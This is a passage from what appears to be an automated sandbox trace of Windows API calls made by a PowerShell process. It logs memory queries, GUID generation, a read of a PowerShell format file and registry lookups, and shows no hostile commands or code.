lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.397] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.398] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.398] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.398] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.398] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.398] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.399] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x6a732345, Data2=0xee18, Data3=0x493d, Data4=([0]=0x80, [1]=0x10, [2]=0x58, [3]=0x20, [4]=0x22, [5]=0x12, [6]=0xd, [7]=0xad))) returned 0x0 [0103.399] VirtualQuery (in: lpAddress=0x1ab780, lpBuffer=0x1ac640, dwLength=0x30 | out: lpBuffer=0x1ac640*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.399] VirtualQuery (in: lpAddress=0x1ab780, lpBuffer=0x1ac640, dwLength=0x30 | out: lpBuffer=0x1ac640*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.399] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.400] VirtualQuery (in: lpAddress=0x1ab780, lpBuffer=0x1ac640, dwLength=0x30 | out: lpBuffer=0x1ac640*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.400] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.400] VirtualQuery (in: lpAddress=0x1ab780, lpBuffer=0x1ac640, dwLength=0x30 | out: lpBuffer=0x1ac640*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.400] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.401] VirtualQuery (in: lpAddress=0x1ab780, lpBuffer=0x1ac640, dwLength=0x30 | out: lpBuffer=0x1ac640*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.401] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.401] VirtualQuery (in: lpAddress=0x1ab780, lpBuffer=0x1ac640, dwLength=0x30 | out: lpBuffer=0x1ac640*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.402] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.402] VirtualQuery (in: lpAddress=0x1ab780, lpBuffer=0x1ac640, dwLength=0x30 | out: lpBuffer=0x1ac640*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.402] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.402] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.403] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.403] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.403] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.403] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.403] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.404] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.404] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xab5f54b9, Data2=0xcc6d, Data3=0x4d88, Data4=([0]=0x89, [1]=0x1c, [2]=0xeb, [3]=0x60, [4]=0x7d, [5]=0x4c, [6]=0xf2, [7]=0xe4))) returned 0x0 [0103.404] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.404] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.405] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.405] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.405] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.405] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.405] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.406] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.406] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.406] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.406] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.406] VirtualQuery (in: lpAddress=0x1ab440, lpBuffer=0x1ac300, dwLength=0x30 | out: lpBuffer=0x1ac300*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.406] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.407] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.407] VirtualQuery (in: lpAddress=0x1ab770, lpBuffer=0x1ac630, dwLength=0x30 | out: lpBuffer=0x1ac630*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.407] VirtualQuery (in: lpAddress=0x1ab800, lpBuffer=0x1ac6c0, dwLength=0x30 | out: lpBuffer=0x1ac6c0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.407] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf65661b1, Data2=0x9f7a, Data3=0x42c5, Data4=([0]=0xb8, [1]=0x93, [2]=0x28, [3]=0x8f, [4]=0xa0, [5]=0x93, [6]=0xcd, [7]=0x8f))) returned 0x0 [0103.408] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xe0a27fa6, Data2=0xc3c6, Data3=0x43c2, Data4=([0]=0xbb, [1]=0x56, [2]=0x47, [3]=0x36, [4]=0xca, [5]=0x1f, [6]=0xfd, [7]=0x9f))) returned 0x0 [0103.408] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x6c8468, Data2=0x7432, Data3=0x4b7e, Data4=([0]=0xb4, [1]=0x1f, [2]=0xb0, [3]=0x70, [4]=0xab, [5]=0xd5, [6]=0x40, [7]=0xea))) returned 0x0 [0103.408] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x1a42c628, Data2=0x8d31, Data3=0x41ea, Data4=([0]=0xbb, [1]=0x35, [2]=0x1, [3]=0x8b, [4]=0x5a, [5]=0xd7, [6]=0x56, [7]=0xa7))) returned 0x0 [0103.409] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x1fa2498c, Data2=0x6d98, Data3=0x49b9, Data4=([0]=0x8a, [1]=0xef, [2]=0x6e, [3]=0xc6, [4]=0x82, [5]=0xc, [6]=0xa7, [7]=0xba))) returned 0x0 [0103.409] VirtualQuery (in: lpAddress=0x1ab550, lpBuffer=0x1ac410, dwLength=0x30 | out: lpBuffer=0x1ac410*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.409] VirtualQuery (in: lpAddress=0x1ab5e0, lpBuffer=0x1ac4a0, dwLength=0x30 | out: lpBuffer=0x1ac4a0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0103.409] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x8f4a257, Data2=0x34aa, Data3=0x4cf5, Data4=([0]=0xa3, [1]=0x51, [2]=0xd4, [3]=0xd0, [4]=0x24, [5]=0x28, [6]=0x37, [7]=0xd7))) returned 0x0 [0103.410] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xe10dc30d, Data2=0x6fe0, Data3=0x4ab1, Data4=([0]=0xb0, [1]=0xf, [2]=0x99, [3]=0x44, [4]=0x69, [5]=0x87, [6]=0x2f, [7]=0xc0))) returned 0x0 [0103.410] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xf98041ae, Data2=0x8b3c, Data3=0x436b, Data4=([0]=0xb6, [1]=0x29, [2]=0x37, [3]=0xbc, [4]=0x9d, [5]=0x9b, [6]=0xe3, [7]=0xfb))) returned 0x0 [0103.410] SetErrorMode (uMode=0x1) returned 0x1 [0103.411] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0103.411] SetErrorMode (uMode=0x1) returned 0x1 [0103.411] GetFileType (hFile=0x308) returned 0x1 [0103.411] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.412] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.413] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.413] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.413] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.414] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.414] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.414] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.414] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.415] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.415] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.415] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.415] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.415] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.415] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.416] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.416] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.417] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.417] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.417] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.417] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x1000, lpOverlapped=0x0) returned 1 [0103.417] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0xe67, lpOverlapped=0x0) returned 1 [0103.417] ReadFile (in: hFile=0x308, lpBuffer=0x3999a17, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x3999a17*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.417] ReadFile (in: hFile=0x308, lpBuffer=0x399a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1acd38, lpOverlapped=0x0 | out: lpBuffer=0x399a448*, lpNumberOfBytesRead=0x1acd38*=0x0, lpOverlapped=0x0) returned 1 [0103.418] SetErrorMode (uMode=0x1) returned 0x1 [0103.418] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1acce0 | out: lpFileInformation=0x1acce0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0103.418] SetErrorMode (uMode=0x1) returned 0x1 [0103.418] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1acdc8 | out: phkResult=0x1acdc8*=0x308) returned 0x0 [0103.418] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd4c, lpData=0x0, lpcbData=0x1acd48*=0x0 | out: lpType=0x1acd4c*=0x1, lpData=0x0, lpcbData=0x1acd48*=0x56) returned 0x0 [0103.418] CoTaskMemAlloc (cb=0x5a) returned 0x1b753fe0 [0103.418] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1acd1c, lpData=0x1b753fe0, lpcbData=0x1acd18*=0x56 | out: lpType=0x1acd1c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1acd18*=0x56) returned 0x0 [0103.418] CoTaskMemFree (pv=0x1b753fe0) [0103.418] RegCloseKey (hKey=0x308) returned 0x0 [0103.421] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xc121b2e2, Data2=0x7462, Data3=0x48ae, Data4=([0]=0x84, [1]=0xcb, [2]=0x76, [3]=0xed, [4]=0x94, [5]=0x74, [6]=0xa, [7]=0x32))) returned 0x0 [0103.422] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xa79e3b2, Data2=0x663c, Data3=0x4b97, Data4=([0]=0xb1, [1]=0xb1, [2]=0xb4, [3]=0xb1, [4]=0xf, [5]=0x27, [6]=0xb9, [7]=0xb3))) returned 0x0 [0103.422] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x2524cd2d, Data2=0x9062, Data3=0x4621, Data4=([0]=0x90, [1]=0x5b, [2]=0x45, [3]=0xa, [4]=0x94, [5]=0x83, [6]=0xda, [7]=0x2))) returned 0x0 [0103.422] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xbb1ec4c, Data2=0x2e45, Data3=0x45e1, Data4=([0]=0x93, [1]=0xea, [2]=0x23, [3]=0xa6, [4]=0xa7, [5]=0x26, [6]=0x43, [7]=0xb0))) returned 0x0 [0103.422] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0xdc039867, Data2=0xb47e, Data3=0x402f, Data4=([0]=0x82, [1]=0xdf, [2]=0x2d, [3]=0x32, [4]=0x8, [5]=0x81, [6]=0x9a, [7]=0xe3))) returned 0x0 [0103.422] CoCreateGuid (in: pguid=0x1acff0 | out: pguid=0x1acff0*(Data1=0x7e8e3f12, Data2=0xf95f, Data3=0x4a5d, Data4=([0]=0xba, [1]=0x26, [2]=0x88, [3]=0xe4, [4]=0xde, [5]=0xdb, [6]=0xe8, [7]=0xa6))) returned 0x0 [0103.422] CoCreateGuid (in: pguid=0x1acff0 | out: 